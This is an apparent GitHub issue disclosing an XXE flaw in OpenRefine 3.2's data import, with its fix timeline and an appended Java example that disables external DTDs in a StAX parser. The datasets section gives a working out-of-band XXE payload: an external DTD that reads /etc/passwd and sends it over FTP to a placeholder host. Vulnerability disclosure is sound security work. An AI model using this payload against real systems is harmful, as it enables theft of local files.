XXE vulnerability in creating project #1907

Closed
itsacoderepo opened this issue Dec 14, 2018 · 0 comments
Labels
vulnerability Security vulnerability which needs fixing

Describe the bug
OpenRefine 3.2 (and below) has an XXE vulnerability that can be triggered through a data import. It is possible to steal data from an OpenRefine user.

Please consider disabling external DTDs.

To Reproduce
See the video (zipped because of GH file extension restrictions) xxe.zip

Current Results
File content is sent over FTP, no feedback is shown to the user.

Desktop (please complete the following information):
Tested on (desktop version is not important)

$ java -version
openjdk version "1.8.0_192"
OpenJDK Runtime Environment (build 1.8.0_192-b26)
OpenJDK 64-Bit Server VM (build 25.192-b26, mixed mode)

OpenRefine (please complete the following information):

  • Version 3.2 (and below)

Datasets
ext.dtd

<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:5555/%d;'>">

payload.xml

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

Additional info
Sorry that I was a bit inactive during the last issue :).

itsacoderepo changed the title from "XXE Vulnerability in creating project" to "XXE vulnerability in creating project" on Dec 14, 2018
wetneb self-assigned this on Dec 31, 2018
wetneb added the "pull request pending" label (For issues that will be fixed by an open PR) on Dec 31, 2018
wetneb closed this as completed in 6a0d7d5 on Jan 7, 2019
wetneb added the "vulnerability" label (Security vulnerability which needs fixing) and removed the "pull request pending" label (For issues that will be fixed by an open PR) on Jan 26, 2019
wetneb added this to the 3.2 milestone on Mar 1, 2019
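
One way to act on the report's request to disable external DTDs, written against the standard StAX API in the JDK. This is an added example, not OpenRefine's code and not the change made in 6a0d7d5; the class and method names and the sample input are assumptions, as is the premise that the importer reads XML through `XMLInputFactory`.

```java
import java.io.StringReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public class HardenedStaxImport {

    // Constructed sample shaped like payload.xml; 192.0.2.1 is a documentation-only address.
    static final String SAMPLE =
          "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE a [\n"
        + "<!ENTITY % asd SYSTEM \"http://192.0.2.1/ext.dtd\">\n"
        + "%asd;\n"
        + "]>\n"
        + "<a>&rrr;</a>";

    /** Factory that refuses DTD processing and any external entity or DTD fetch. */
    static XMLInputFactory hardenedFactory() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        // No DTD support: parameter entities such as %asd; are never expanded.
        f.setProperty(XMLInputFactory.SUPPORT_DTD, Boolean.FALSE);
        // No external general entities, so &rrr; cannot reach file:// or ftp:// URLs.
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);
        // Defense in depth: fail loudly if the parser still asks to resolve something.
        f.setXMLResolver((publicId, systemId, baseUri, ns) -> {
            throw new XMLStreamException("external entity blocked: " + systemId);
        });
        return f;
    }

    /** Returns the document's text content, or a rejection message if parsing fails. */
    static String importText(String xml) {
        StringBuilder text = new StringBuilder();
        try {
            XMLStreamReader r = hardenedFactory().createXMLStreamReader(new StringReader(xml));
            while (r.hasNext()) {
                if (r.next() == XMLStreamConstants.CHARACTERS) text.append(r.getText());
            }
            r.close();
        } catch (XMLStreamException e) {
            return "rejected: " + e.getMessage(); // surface the failure to the user
        }
        return "imported: " + text;
    }

    public static void main(String[] args) {
        System.out.println(importText("<a>plain row</a>")); // ordinary import still works
        System.out.println(importText(SAMPLE));             // DOCTYPE input makes no network or file access
    }
}
```

Returning the rejection message also addresses the "no feedback is shown to the user" part of the report. Any other parser entry points an importer uses (DOM, SAX, XSLT) each need their own equivalent settings.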